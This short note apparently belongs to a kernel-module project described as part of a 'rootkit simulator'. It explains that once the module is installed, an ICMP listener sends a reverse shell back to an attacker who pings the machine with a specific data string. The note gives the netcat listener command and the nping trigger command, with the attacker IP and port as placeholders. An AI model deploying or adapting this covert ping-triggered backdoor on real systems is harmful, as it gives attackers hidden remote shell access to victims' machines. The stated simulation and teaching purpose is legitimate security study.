================================================================= When this kernel module is installed it invokes an icmp listener script, this script sends a reverse shell in response to an attacker ping.
Using nc -l [PORT] and then in a separate window running nping --icmp -c 1 -dest-ip [victim ip] --data-string 'amogh_$H3LL [attacker ip] [PORT]'
we can ping the victim machine and send ourselves back a reverse shell. Make sure to have a netcat listener waiting on the port you specify before pinging. This demonstrates how a user-land script/app can be invoked from the kernel. This functionality will be added as part of the final rootkit-simulator